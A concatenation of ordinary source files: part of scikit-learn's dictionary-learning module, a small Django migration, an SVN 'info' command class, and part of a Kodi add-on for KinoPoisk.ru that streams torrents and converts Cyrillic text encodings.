# The covariance of the dictionary
A = np.zeros((n_components, n_components))
# The data approximation
B = np.zeros((n_features, n_components))
for ii, this_X in zip(range(iter_offset, iter_offset + n_iter), batches):
dt = (time.time() - t0)
if verbose == 1:
sys.stdout.write(".")
sys.stdout.flush()
elif verbose:
if verbose > 10 or ii % ceil(100. / verbose) == 0:
print ("Iteration % 3i (elapsed time: % 3is, % 4.1fmn)"
% (ii, dt, dt / 60))
this_code = sparse_encode(this_X, dictionary.T, algorithm=method,
alpha=alpha).T
# Update the auxiliary variables
if ii < batch_size - 1:
theta = float((ii + 1) * batch_size)
else:
theta = float(batch_size ** 2 + ii + 1 - batch_size)
beta = (theta + 1 - batch_size) / (theta + 1)
A *= beta
A += np.dot(this_code, this_code.T)
B *= beta
B += np.dot(this_X.T, this_code.T)
# Update dictionary
dictionary = _update_dict(dictionary, B, A, verbose=verbose,
random_state=random_state)
# XXX: Can the residuals be of any use?
# Maybe we need a stopping criteria based on the amount of
# modification in the dictionary
if callback is not None:
callback(locals())
if return_code:
if verbose > 1:
print('Learning code...', end=' ')
elif verbose == 1:
print('|', end=' ')
code = sparse_encode(X, dictionary.T, algorithm=method, alpha=alpha,
n_jobs=n_jobs)
if verbose > 1:
dt = (time.time() - t0)
print('done (total time: % 3is, % 4.1fmn)' % (dt, dt / 60))
return code, dictionary.T
return dictionary.T
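# Usage sketch (illustrative comment): learn 3 atoms online in mini-batches of 10
# samples; with the default return_code=True both factors are returned.
# code, dictionary = dict_learning_online(X, n_components=3, alpha=1.0, n_iter=50,
#                                         batch_size=10)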
class SparseCodingMixin(TransformerMixin):
"""Sparse coding mixin"""
def _set_sparse_coding_params(self, n_components,
transform_algorithm='omp',
transform_n_nonzero_coefs=None,
transform_alpha=None, split_sign=False,
n_jobs=1):
self.n_components = n_components
self.transform_algorithm = transform_algorithm
self.transform_n_nonzero_coefs = transform_n_nonzero_coefs
self.transform_alpha = transform_alpha
self.split_sign = split_sign
self.n_jobs = n_jobs
def transform(self, X, y=None):
"""Encode the data as a sparse combination of the dictionary atoms.
Coding method is determined by the object parameter
`transform_algorithm`.
Parameters
----------
X : array of shape (n_samples, n_features)
Test data to be transformed, must have the same number of
features as the data used to train the model.
Returns
-------
X_new : array, shape (n_samples, n_components)
Transformed data
"""
# XXX : kwargs is not documented
X = array2d(X)
n_samples, n_features = X.shape
code = sparse_encode(
X, self.components_, algorithm=self.transform_algorithm,
n_nonzero_coefs=self.transform_n_nonzero_coefs,
alpha=self.transform_alpha, n_jobs=self.n_jobs)
if self.split_sign:
# feature vector is split into a positive and negative side
n_samples, n_features = code.shape
split_code = np.empty((n_samples, 2 * n_features))
split_code[:, :n_features] = np.maximum(code, 0)
split_code[:, n_features:] = -np.minimum(code, 0)
code = split_code
return code
class SparseCoder(BaseEstimator, SparseCodingMixin):
"""Sparse coding
Finds a sparse representation of data against a fixed, precomputed
dictionary.
Each row of the result is the solution to a sparse coding problem.
The goal is to find a sparse array `code` such that::
X ~= code * dictionary
Parameters
----------
dictionary : array, [n_components, n_features]
The dictionary atoms used for sparse coding. Lines are assumed to be
normalized to unit norm.
transform_algorithm : {'lasso_lars', 'lasso_cd', 'lars', 'omp', \
'threshold'}
Algorithm used to transform the data:
lars: uses the least angle regression method (linear_model.lars_path)
lasso_lars: uses Lars to compute the Lasso solution
lasso_cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). lasso_lars will be faster if
the estimated components are sparse.
omp: uses orthogonal matching pursuit to estimate the sparse solution
threshold: squashes to zero all coefficients less than alpha from
the projection ``dictionary * X'``
transform_n_nonzero_coefs : int, ``0.1 * n_features`` by default
Number of nonzero coefficients to target in each column of the
solution. This is only used by `algorithm='lars'` and `algorithm='omp'`
and is overridden by `alpha` in the `omp` case.
transform_alpha : float, 1. by default
If `algorithm='lasso_lars'` or `algorithm='lasso_cd'`, `alpha` is the
penalty applied to the L1 norm.
If `algorithm='threshold'`, `alpha` is the absolute value of the
threshold below which coefficients will be squashed to zero.
If `algorithm='omp'`, `alpha` is the tolerance parameter: the value of
the reconstruction error targeted. In this case, it overrides
`n_nonzero_coefs`.
split_sign : bool, False by default
Whether to split the sparse feature vector into the concatenation of
its negative part and its positive part. This can improve the
performance of downstream classifiers.
n_jobs : int,
number of parallel jobs to run
Attributes
----------
`components_` : array, [n_components, n_features]
The unchanged dictionary atoms
See also
--------
DictionaryLearning
MiniBatchDictionaryLearning
SparsePCA
MiniBatchSparsePCA
sparse_encode
"""
def __init__(self, dictionary, transform_algorithm='omp',
transform_n_nonzero_coefs=None, transform_alpha=None,
split_sign=False, n_jobs=1):
self._set_sparse_coding_params(dictionary.shape[0],
transform_algorithm,
transform_n_nonzero_coefs,
transform_alpha, split_sign, n_jobs)
self.components_ = dictionary
def fit(self, X, y=None):
"""Do nothing and return the estimator unchanged
This method is just there to implement the usual API and hence
work in pipelines.
"""
return self
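# Usage sketch (illustrative comment): wrap a fixed dictionary D of shape
# (n_components, n_features) and sparse-code data X of shape (n_samples, n_features).
# coder = SparseCoder(dictionary=D, transform_algorithm='lasso_lars', transform_alpha=0.1)
# codes = coder.transform(X)   # shape (n_samples, n_components)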
class DictionaryLearning(BaseEstimator, SparseCodingMixin):
"""Dictionary learning
Finds a dictionary (a set of atoms) that can best be used to represent data
using a sparse code.
Solves the optimization problem::
(U^*,V^*) = argmin 0.5 || Y - U V ||_2^2 + alpha * || U ||_1
(U,V)
with || V_k ||_2 = 1 for all 0 <= k < n_components
Parameters
----------
n_components : int,
number of dictionary elements to extract
alpha : int,
sparsity controlling parameter
max_iter : int,
maximum number of iterations to perform
tol : float,
tolerance for numerical error
fit_algorithm : {'lars', 'cd'}
lars: uses the least angle regression method to solve the lasso problem
(linear_model.lars_path)
cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). Lars will be faster if
the estimated components are sparse.
transform_algorithm : {'lasso_lars', 'lasso_cd', 'lars', 'omp', \
'threshold'}
Algorithm used to transform the data
lars: uses the least angle regression method (linear_model.lars_path)
lasso_lars: uses Lars to compute the Lasso solution
lasso_cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). lasso_lars will be faster if
the estimated components are sparse.
omp: uses orthogonal matching pursuit to estimate the sparse solution
threshold: squashes to zero all coefficients less than alpha from
the projection ``dictionary * X'``
transform_n_nonzero_coefs : int, ``0.1 * n_features`` by default
Number of nonzero coefficients to target in each column of the
solution. This is only used by `algorithm='lars'` and `algorithm='omp'`
and is overridden by `alpha` in the `omp` case.
transform_alpha : float, 1. by default
If `algorithm='lasso_lars'` or `algorithm='lasso_cd'`, `alpha` is the
penalty applied to the L1 norm.
If `algorithm='threshold'`, `alpha` is the absolute value of the
threshold below which coefficients will be squashed to zero.
If `algorithm='omp'`, `alpha` is the tolerance parameter: the value of
the reconstruction error targeted. In this case, it overrides
`n_nonzero_coefs`.
split_sign : bool, False by default
Whether to split the sparse feature vector into the concatenation of
its negative part and its positive part. This can improve the
performance of downstream classifiers.
n_jobs : int,
number of parallel jobs to run
code_init : array of shape (n_samples, n_components),
initial value for the code, for warm restart
dict_init : array of shape (n_components, n_features),
initial values for the dictionary, for warm restart
verbose :
degree of verbosity of the printed output
random_state : int or RandomState
Pseudo number generator state used for random sampling.
Attributes
----------
`components_` : array, [n_components, n_features]
dictionary atoms extracted from the data
`error_` : array
vector of errors at each iteration
Notes
-----
**References:**
J. Mairal, F. Bach, J. Ponce, G. Sapiro, 2009: Online dictionary learning
for sparse coding (http://www.di.ens.fr/sierra/pdfs/icml09.pdf)
See also
--------
SparseCoder
MiniBatchDictionaryLearning
SparsePCA
MiniBatchSparsePCA
"""
def __init__(self, n_components=None, alpha=1, max_iter=1000, tol=1e-8,
fit_algorithm='lars', transform_algorithm='omp',
transform_n_nonzero_coefs=None, transform_alpha=None,
n_jobs=1, code_init=None, dict_init=None, verbose=False,
split_sign=False, random_state=None):
self._set_sparse_coding_params(n_components, transform_algorithm,
transform_n_nonzero_coefs,
transform_alpha, split_sign, n_jobs)
self.alpha = alpha
self.max_iter = max_iter
self.tol = tol
self.fit_algorithm = fit_algorithm
self.code_init = code_init
self.dict_init = dict_init
self.verbose = verbose
self.random_state = random_state
def fit(self, X, y=None):
"""Fit the model from data in X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
            Training vector, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
self: object
Returns the object itself
"""
random_state = check_random_state(self.random_state)
X = array2d(X)
if self.n_components is None:
n_components = X.shape[1]
else:
n_components = self.n_components
V, U, E = dict_learning(X, n_components, self.alpha,
tol=self.tol, max_iter=self.max_iter,
method=self.fit_algorithm,
n_jobs=self.n_jobs,
code_init=self.code_init,
dict_init=self.dict_init,
verbose=self.verbose,
random_state=random_state)
self.components_ = U
self.error_ = E
return self
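# Usage sketch (illustrative comment): fit a dictionary of 4 atoms, then sparse-code
# new data with the default transform_algorithm='omp'.
# dl = DictionaryLearning(n_components=4, alpha=1.0, max_iter=50).fit(X)
# codes = dl.transform(X_new)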
class MiniBatchDictionaryLearning(BaseEstimator, SparseCodingMixin):
"""Mini-batch dictionary learning
Finds a dictionary (a set of atoms) that can best be used to represent data
using a sparse code.
Solves the optimization problem::
(U^*,V^*) = argmin 0.5 || Y - U V ||_2^2 + alpha * || U ||_1
(U,V)
with || V_k ||_2 = 1 for all 0 <= k < n_components
Parameters
----------
n_components : int,
number of dictionary elements to extract
alpha : int,
sparsity controlling parameter
n_iter : int,
total number of iterations to perform
fit_algorithm : {'lars', 'cd'}
lars: uses the least angle regression method to solve the lasso problem
(linear_model.lars_path)
cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). Lars will be faster if
the estimated components are sparse.
transform_algorithm : {'lasso_lars', 'lasso_cd', 'lars', 'omp', \
'threshold'}
Algorithm used to transform the data.
lars: uses the least angle regression method (linear_model.lars_path)
lasso_lars: uses Lars to compute the Lasso solution
lasso_cd: uses the coordinate descent method to compute the
Lasso solution (linear_model.Lasso). lasso_lars will be faster if
the estimated components are sparse.
omp: uses orthogonal matching pursuit to estimate the sparse solution
threshold: squashes to zero all coefficients less than alpha from
the projection dictionary * X'
transform_n_nonzero_coefs : int, ``0.1 * n_features`` by default
Number of nonzero coefficients to target in each column of the
solution. This is only used by `algorithm='lars'` and `algorithm='omp'`
and is overridden by `alpha` in the `omp` case.
transform_alpha : float, 1. by default
If `algorithm='lasso_lars'` or `algorithm='lasso_cd'`, `alpha` is the
penalty applied to the L1 norm.
If `algorithm='threshold'`, `alpha` is the absolute value of the
threshold below which coefficients will be squashed to zero.
If `algorithm='omp'`, `alpha` is the tolerance parameter: the value of
the reconstruction error targeted. In this case, it overrides
`n_nonzero_coefs`.
split_sign : bool, False by default
Whether to split the sparse feature vector into the concatenation of
its negative part and its positive part. This can improve the
performance of downstream classifiers.
n_jobs : int,
number of parallel jobs to run
dict_init : array of shape (n_components, n_features),
initial value of the dictionary for warm restart scenarios
verbose :
degree of verbosity of the printed output
batch_size : int,
number of samples in each mini-batch
shuffle : bool,
whether to shuffle the samples before forming batches
random_state : int or RandomState
Pseudo number generator state used for random sampling.
Attributes
----------
`components_` : array, [n_components, n_features]
components extracted from the data
Notes
-----
**References:**
J. Mairal, F. Bach, J. Ponce, G. Sapiro, 2009: Online dictionary learning
for sparse coding (http://www.di.ens.fr/sierra/pdfs/icml09.pdf)
See also
--------
SparseCoder
DictionaryLearning
SparsePCA
MiniBatchSparsePCA
"""
def __init__(self, n_components=None, alpha=1, n_iter=1000,
fit_algorithm='lars', n_jobs=1, batch_size=3,
shuffle=True, dict_init=None, transform_algorithm='omp',
transform_n_nonzero_coefs=None, transform_alpha=None,
verbose=False, split_sign=False, random_state=None):
self._set_sparse_coding_params(n_components, transform_algorithm,
transform_n_nonzero_coefs,
transform_alpha, split_sign, n_jobs)
self.alpha = alpha
self.n_iter = n_iter
self.fit_algorithm = fit_algorithm
self.dict_init = dict_init
self.verbose = verbose
self.shuffle = shuffle
self.batch_size = batch_size
self.split_sign = split_sign
self.random_state = random_state
def fit(self, X, y=None):
"""Fit the model from data in X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
            Training vector, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
self : object
Returns the instance itself.
"""
random_state = check_random_state(self.random_state)
X = array2d(X)
if self.n_components is None:
n_components = X.shape[1]
else:
n_components = self.n_components
U = dict_learning_online(X, n_components, self.alpha,
n_iter=self.n_iter, return_code=False,
method=self.fit_algorithm,
n_jobs=self.n_jobs,
dict_init=self.dict_init,
batch_size=self.batch_size,
shuffle=self.shuffle, verbose=self.verbose,
random_state=random_state)
self.components_ = U
return self
def partial_fit(self, X, y=None, iter_offset=0):
"""Updates the model using the data in X as a mini-batch.
Parameters
----------
X: array-like, shape (n_samples, n_features)
            Training vector, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
self : object
Returns the instance itself.
"""
        if not hasattr(self, 'random_state_'):
self.random_state_ = check_random_state(self.random_state)
X = array2d(X)
if hasattr(self, 'components_'):
dict_init = self.components_
else:
dict_init = self.dict_init
U = dict_learning_online(X, self.n_components, self.alpha,
n_iter=self.n_iter,
method=self.fit_algorithm,
n_jobs=self.n_jobs, dict_init=dict_init,
batch_size=len(X), shuffle=False,
verbose=self.verbose, return_code=False,
iter_offset=iter_offset,
random_state=self.random_state_)
self.components_ = U
return self
| B3AU/waveTree | sklearn/decomposition/dict_learning.py | Python | bsd-3-clause | 40,489 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-17 02:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rvu', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='billingcode',
options={'ordering': ('ordering', 'code_name')},
),
migrations.AddField(
model_name='billingcode',
name='ordering',
field=models.IntegerField(blank=True, null=True),
),
]
| craighagan/rvumanager | rvusite/rvu/migrations/0002_auto_20160416_2224.py | Python | apache-2.0 | 593 |
import base
import datetime
class info(base.SVNBase):
def __init__(self, argv):
base.SVNBase.__init__(self)
self.path = '.'
self.recurse = False
if len(argv) > 0:
self.path = argv[-1]
def execute(self):
entries = self.client.info2(self.path, recurse=self.recurse)
for file, entry in entries:
self.display(file, entry)
def display(self, file, entry):
wc = entry.wc_info
print 'Path: ', self.path
self.display_field(entry, 'URL: ', 'URL')
self.display_field(entry, 'Repository Root: ', 'repos_root_URL')
if wc and wc.copyfrom_url:
self.display_field(wc, 'Branched from', 'copyfrom_url')
            self.display_field(wc, 'Branched at', 'copyfrom_rev', self.format_rev)
self.display_field(entry, 'Repository UUID: ', 'repos_UUID')
self.display_field(entry, 'Revision: ', 'rev', self.format_rev)
self.display_field(entry, 'Node Kind: ', 'kind')
if wc:
self.display_field(wc, 'Schedule: ', 'schedule')
self.display_field(entry, 'Last commit author: ', 'last_changed_author')
self.display_field(entry, 'Last commit rev', 'last_changed_rev', self.format_rev)
self.display_field(entry, 'Last commit date', 'last_changed_date', self.format_datetime)
if wc:
self.display_field(wc, 'Text Last Updated: ', 'text_time', self.format_datetime)
self.display_field(wc, 'Checksum', 'checksum')
print
def display_field(self, container, info, field, format = None):
value = container.data[field]
if value:
if format:
print info + ': ', format(value)
else:
print info + ': ', value
def format_datetime(self, timestamp):
t = datetime.datetime.fromtimestamp(timestamp)
return t.strftime('%Y-%m-%d %H:%M:%S %z (%a, %d %b %Y)')
def format_rev(self, rev):
return rev.number
| ext/svnc | info.py | Python | gpl-3.0 | 2,022 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# * Copyright (C) 2011 TDW
import sys, xbmc, xbmcgui, xbmcplugin, xbmcaddon, os, urllib, time, codecs, httplib, Cookie
import SelectBox
from KPmenu import *
PLUGIN_NAME = 'KinoPoisk.ru'
siteUrl = 'www.KinoPoisk.ru'
httpSiteUrl = 'http://' + siteUrl
handle = int(sys.argv[1])
addon = xbmcaddon.Addon(id='plugin.video.KinoPoisk.ru')
__settings__ = xbmcaddon.Addon(id='plugin.video.KinoPoisk.ru')
xbmcplugin.setContent(int(sys.argv[1]), 'movies')
icon = os.path.join( addon.getAddonInfo('path'), 'icon.png')
dbDir = os.path.join( addon.getAddonInfo('path'), "db" )
LstDir = addon.getAddonInfo('path')
headers = {
'User-Agent' : 'Opera/9.80 (X11; Linux i686; U; ru) Presto/2.7.62 Version/11.00',
'Accept' :' text/html, application/xml, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*',
'Accept-Language':'ru-RU,ru;q=0.9,en;q=0.8',
'Accept-Charset' :'utf-8, utf-16, *;q=0.1',
'Accept-Encoding':'identity, *;q=0'
}
#---------asengine----by-nuismons-----
from ASCore import TSengine,_TSPlayer
def play_url(torr_link,img):
#print torr_link
TSplayer=TSengine()
out=TSplayer.load_torrent(torr_link,'TORRENT')
if out=='Ok':
for k,v in TSplayer.files.iteritems():
li = xbmcgui.ListItem(urllib.unquote(k))
uri = construct_request({
't': torr_link,
'tt': k.encode('utf-8'),
'i':v,
'ii':urllib.quote(img),
'mode': 'addplist'
})
li.setProperty('IsPlayable', 'true')
li.addContextMenuItems([('Добавить в плейлист', 'XBMC.RunPlugin(%s)' % uri),])
uri = construct_request({
'torr_url': torr_link,
'title': k,
'ind':v,
'img':img,
'func': 'play_url2',
'mode': 'play_url2'
})
#li.addContextMenuItems([('Добавить в плейлист', 'XBMC.RunPlugin(%s?func=addplist&torr_url=%s&title=%s&ind=%s&img=%s&func=play_url2)' % (sys.argv[0],urllib.quote(torr_link),k,v,img )),])
xbmcplugin.addDirectoryItem(int(sys.argv[1]), uri, li)
xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_LABEL)
xbmcplugin.setContent(int(sys.argv[1]), 'movies')
xbmcplugin.endOfDirectory(int(sys.argv[1]))
TSplayer.end()
def addplist(params):
li = xbmcgui.ListItem(params['tt'])
uri = construct_request({
'torr_url': params['t'],
'title': params['tt'].decode('utf-8'),
'ind':urllib.unquote_plus(params['i']),
'img':urllib.unquote_plus(params['ii']),
'mode': 'play_url2'
})
xbmc.PlayList(xbmc.PLAYLIST_VIDEO).add(uri,li)
def play_url2(params):
#print 'play'
torr_link=urllib.unquote(params["torr_url"])
img=urllib.unquote_plus(params["img"])
title=urllib.unquote_plus(params["title"])
#showMessage('heading', torr_link, 10000)
TSplayer=TSengine()
out=TSplayer.load_torrent(torr_link,'TORRENT')
if out=='Ok':
lnk=TSplayer.get_link(int(params['ind']),title, img, img)
if lnk:
item = xbmcgui.ListItem(path=lnk, thumbnailImage=img, iconImage=img)
xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
            while not xbmc.Player().isPlaying():
xbmc.sleep(300)
while TSplayer.player.active and not TSplayer.local:
TSplayer.loop()
xbmc.sleep(300)
if xbmc.abortRequested:
TSplayer.log.out("XBMC is shutting down")
break
if TSplayer.local and xbmc.Player().isPlaying:
try: time1=TSplayer.player.getTime()
except: time1=0
i = xbmcgui.ListItem("***%s"%title)
i.setProperty('StartOffset', str(time1))
xbmc.Player().play(TSplayer.filename.decode('utf-8'),i)
else:
item = xbmcgui.ListItem(path='')
xbmcplugin.setResolvedUrl(int(sys.argv[1]), False, item)
TSplayer.end()
    xbmc.Player().stop()
#--------------tsengine----by-nuismons--------------
from TSCore import TSengine as tsengine
def construct_request(params):
return '%s?%s' % (sys.argv[0], urllib.urlencode(params))
def play_url_old(params):
torr_link=params['file']
img=urllib.unquote_plus(params["img"])
#showMessage('heading', torr_link, 10000)
TSplayer=tsengine()
out=TSplayer.load_torrent(torr_link,'TORRENT')
if out=='Ok':
for k,v in TSplayer.files.iteritems():
li = xbmcgui.ListItem(urllib.unquote(k))
uri = construct_request({
'torr_url': torr_link,
'title': k,
'ind':v,
'img':img,
'mode': 'play_url2'
})
xbmcplugin.addDirectoryItem(handle, uri, li, False)
xbmcplugin.endOfDirectory(handle)
TSplayer.end()
def play_url2_old(params):
#torr_link=params['torr_url']
torr_link=urllib.unquote_plus(params["torr_url"])
img=urllib.unquote_plus(params["img"])
title=urllib.unquote_plus(params["title"])
#showMessage('heading', torr_link, 10000)
TSplayer=tsengine()
out=TSplayer.load_torrent(torr_link,'TORRENT')
if out=='Ok':
TSplayer.play_url_ind(int(params['ind']),title, icon, img)
TSplayer.end()
#-----------------------libtorrents-torrenter-by-slng--------------------------------
try: import Downloader
except: pass
def playTorrent(url, StorageDirectory):
torrentUrl = url#__settings__.getSetting("lastTorrent")
if 0 != len(torrentUrl):
contentId = 0#int(urllib.unquote_plus(url))
torrent = Downloader.Torrent(torrentUrl, StorageDirectory)
torrent.startSession(contentId)
iterator = 0
progressBar = xbmcgui.DialogProgress()
progressBar.create('Подождите', 'Идёт поиск сидов.')
downloadedSize = 0
while downloadedSize < (44 * 1024 * 1024): #not torrent.canPlay:
time.sleep(0.1)
progressBar.update(iterator)
iterator += 1
if iterator == 100:
iterator = 0
downloadedSize = torrent.torrentHandle.file_progress()[contentId]
dialogText = 'Preloaded: ' + str(downloadedSize / 1024 / 1024) + ' MB / ' + str(torrent.getContentList()[contentId].size / 1024 / 1024) + ' MB'
peersText = ' [%s: %s; %s: %s]' % ('Seeds', str(torrent.torrentHandle.status().num_seeds), 'Peers', str(torrent.torrentHandle.status().num_peers))
speedsText = '%s: %s Mbit/s; %s: %s Mbit/s' % ('Downloading', str(torrent.torrentHandle.status().download_payload_rate * 8/ 1000000), 'Uploading', str(torrent.torrentHandle.status().upload_payload_rate * 8 / 1000000))
progressBar.update(iterator, 'Seeds searching.' + peersText, dialogText, speedsText)
if progressBar.iscanceled():
progressBar.update(0)
progressBar.close()
torrent.threadComplete = True
return
progressBar.update(0)
progressBar.close()
playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
playlist.clear()
listitem = xbmcgui.ListItem(torrent.getContentList()[contentId].path)
playlist.add('file:///' + torrent.getFilePath(contentId), listitem)
progressBar.close()
xbmc.Player().play(playlist)
progressBar.close()
time.sleep(15)
while 1 == xbmc.Player().isPlayingVideo():
torrent.fetchParts()
torrent.checkThread()
time.sleep(1)
xbmc.executebuiltin("Notification(%s, %s)" % ('Информация', 'Загрузка торрента прекращена.'))
torrent.threadComplete = True
else:
print " Unexpected access to method playTorrent() without torrent content"
#===========================================================
def ru(x):return unicode(x,'utf8', 'ignore')
def xt(x):return xbmc.translatePath(x)
def mfindal(http, ss, es):
L=[]
while http.find(es)>0:
s=http.find(ss)
e=http.find(es)
i=http[s:e]
L.append(i)
http=http[e+2:]
return L
def debug(s):
fl = open(ru(os.path.join( addon.getAddonInfo('path'),"test.txt")), "w")
fl.write(s)
fl.close()
def inputbox():
skbd = xbmc.Keyboard()
skbd.setHeading('Поиск:')
skbd.doModal()
if skbd.isConfirmed():
SearchStr = skbd.getText()
return SearchStr
else:
return ""
def showMessage(heading, message, times = 3000):
xbmc.executebuiltin('XBMC.Notification("%s", "%s", %s, "%s")'%(heading, message, times, icon))
def GET(target, referer, post_params = None, accept_redirect = True, get_redirect_url = False, siteUrl='www.KinoPoisk.ru'):
try:
connection = httplib.HTTPConnection(siteUrl)
if post_params == None:
method = 'GET'
post = None
else:
method = 'POST'
post = urllib.urlencode(post_params)
headers['Content-Type'] = 'application/x-www-form-urlencoded'
sid_file = os.path.join(xbmc.translatePath('special://temp/'), 'plugin.video.KinoPoisk.ru.cookies.sid')
if os.path.isfile(sid_file):
fh = open(sid_file, 'r')
csid = fh.read()
fh.close()
headers['Cookie'] = 'session=%s' % csid
headers['Referer'] = referer
connection.request(method, target, post, headers = headers)
response = connection.getresponse()
if response.status == 403:
raise Exception("Forbidden, check credentials")
if response.status == 404:
raise Exception("File not found")
if accept_redirect and response.status in (301, 302):
target = response.getheader('location', '')
if target.find("://") < 0:
target = httpSiteUrl + target
if get_redirect_url:
return target
else:
return GET(target, referer, post_params, False)
try:
sc = Cookie.SimpleCookie()
sc.load(response.msg.getheader('Set-Cookie'))
fh = open(sid_file, 'w')
fh.write(sc['session'].value)
fh.close()
except: pass
if get_redirect_url:
return False
else:
http = response.read()
return http
except Exception, e:
showMessage('Error', e, 5000)
return None
def fs(s):
s=str(repr(s))[1:-1]
s=s.replace('\\xb8','ё')
s=s.replace('\\xe0','a')
s=s.replace('\\xe1','б')
s=s.replace('\\xe2','в')
s=s.replace('\\xe3','г')
s=s.replace('\\xe4','д')
s=s.replace('\\xe5','е')
s=s.replace('\\xe6','ж')
s=s.replace('\\xe7','з')
s=s.replace('\\xe8','и')
s=s.replace('\\xe9','й')
s=s.replace('\\xea','к')
s=s.replace('\\xeb','л')
s=s.replace('\\xec','м')
s=s.replace('\\xed','н')
s=s.replace('\\xee','о')
s=s.replace('\\xef','п')
s=s.replace('\\xf0','р')
s=s.replace('\\xf1','с')
s=s.replace('\\xf2','т')
s=s.replace('\\xf3','у')
s=s.replace('\\xf4','ф')
s=s.replace('\\xf5','х')
s=s.replace('\\xf6','ц')
s=s.replace('\\xf7','ч')
s=s.replace('\\xf8','ш')
s=s.replace('\\xf9','щ')
s=s.replace('\\xfa','ъ')
s=s.replace('\\xfb','ы')
s=s.replace('\\xfc','ь')
s=s.replace('\\xfd','э')
s=s.replace('\\xfe','ю')
s=s.replace('\\xff','я')
s=s.replace('\\xa8','Ё')
s=s.replace('\\xc0','А')
s=s.replace('\\xc1','Б')
s=s.replace('\\xc2','В')
s=s.replace('\\xc3','Г')
s=s.replace('\\xc4','Д')
s=s.replace('\\xc5','Е')
s=s.replace('\\xc6','Ж')
s=s.replace('\\xc7','З')
s=s.replace('\\xc8','И')
s=s.replace('\\xc9','Й')
s=s.replace('\\xca','К')
s=s.replace('\\xcb','Л')
s=s.replace('\\xcc','М')
s=s.replace('\\xcd','Н')
s=s.replace('\\xce','О')
s=s.replace('\\xcf','П')
s=s.replace('\\xd0','Р')
s=s.replace('\\xd1','С')
s=s.replace('\\xd2','Т')
s=s.replace('\\xd3','У')
s=s.replace('\\xd4','Ф')
s=s.replace('\\xd5','Х')
s=s.replace('\\xd6','Ц')
s=s.replace('\\xd7','Ч')
s=s.replace('\\xd8','Ш')
s=s.replace('\\xd9','Щ')
s=s.replace('\\xda','Ъ')
s=s.replace('\\xdb','Ы')
s=s.replace('\\xdc','Ь')
s=s.replace('\\xdd','Э')
s=s.replace('\\xde','Ю')
s=s.replace('\\xdf','Я')
s=s.replace('\\xab','"')
s=s.replace('\\xbb','"')
s=s.replace('\\r','')
s=s.replace('\\n','\n')
s=s.replace('\\t','\t')
s=s.replace("\\x85",'...')
s=s.replace("\\x97",'-')
s=s.replace("\\xb7","·")
s=s.replace("\\x96",'-')
s=s.replace("\\x92",'')
s=s.replace("\\xb9",'№')
s=s.replace("\\xa0",' ')
s=s.replace('«','"')
s=s.replace('»','"')
s=s.replace('&','&')
s=s.replace('é','é')
s=s.replace('è','è')
s=s.replace('à','à')
s=s.replace('ô','ô')
s=s.replace('ö','ö')
return s
def formatKP(str):
str=str.strip()
str=str.replace('%','%25')
str=str.replace('&','%26')
str=str.replace('?','%3F')
str=str.replace('&','%26')
str=str.replace('!','%21')
str=str.replace(':','%3A')
str=str.replace('#','%23')
str=str.replace(',','%2C')
str=str.replace(';','%3B')
str=str.replace('@','%40')
str=str.replace('(','%28')
str=str.replace(')','%29')
str=str.replace('"','%22')
str=str.replace('а','%E0')
str=str.replace('б','%E1')
str=str.replace('в','%E2')
str=str.replace('г','%E3')
str=str.replace('д','%E4')
str=str.replace('е','%E5')
str=str.replace('ё','%b8')
str=str.replace('ж','%E6')
str=str.replace('з','%E7')
str=str.replace('и','%E8')
str=str.replace('й','%E9')
str=str.replace('к','%EA')
str=str.replace('л','%EB')
str=str.replace('м','%EC')
str=str.replace('н','%ED')
str=str.replace('о','%EE')
str=str.replace('п','%EF')
str=str.replace('р','%F0')
str=str.replace('с','%F1')
str=str.replace('т','%F2')
str=str.replace('у','%F3')
str=str.replace('ф','%F4')
str=str.replace('х','%F5')
str=str.replace('ц','%F6')
str=str.replace('ч','%F7')
str=str.replace('ш','%F8')
str=str.replace('щ','%F9')
    str=str.replace('ъ','%FA')
    str=str.replace('ы','%FB')
    str=str.replace('ь','%FC')
str=str.replace('э','%FD')
str=str.replace('ю','%FE')
str=str.replace('я','%FF')
str=str.replace('А','%C0')
str=str.replace('Б','%C1')
str=str.replace('В','%C2')
str=str.replace('Г','%C3')
str=str.replace('Д','%C4')
str=str.replace('Е','%C5')
str=str.replace('Ё','%A8')
str=str.replace('Ж','%C6')
str=str.replace('З','%C7')
str=str.replace('И','%C8')
str=str.replace('Й','%C9')
str=str.replace('К','%CA')
str=str.replace('Л','%CB')
str=str.replace('М','%CC')
str=str.replace('Н','%CD')
str=str.replace('О','%CE')
str=str.replace('П','%CF')
str=str.replace('Р','%D0')
str=str.replace('С','%D1')
str=str.replace('Т','%D2')
str=str.replace('У','%D3')
str=str.replace('Ф','%D4')
str=str.replace('Х','%D5')
str=str.replace('Ц','%D6')
str=str.replace('Ч','%D7')
str=str.replace('Ш','%D8')
str=str.replace('Щ','%D9')
    str=str.replace('Ъ','%DA')
    str=str.replace('Ы','%DB')
    str=str.replace('Ь','%DC')
str=str.replace('Э','%DD')
str=str.replace('Ю','%DE')
str=str.replace('Я','%DF')
str=str.replace(' ','+')
return str
def get_params():
param=[]
paramstring=sys.argv[2]
if len(paramstring)>=2:
params=sys.argv[2]
cleanedparams=params.replace('?','')
if (params[len(params)-1]=='/'):
params=params[0:len(params)-2]
pairsofparams=cleanedparams.split('&')
param={}
for i in range(len(pairsofparams)):
splitparams={}
splitparams=pairsofparams[i].split('=')
if (len(splitparams))==2:
param[splitparams[0]]=splitparams[1]
return param
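# Worked example (illustrative comment): for sys.argv[2] == "?mode=Search&title=Foo",
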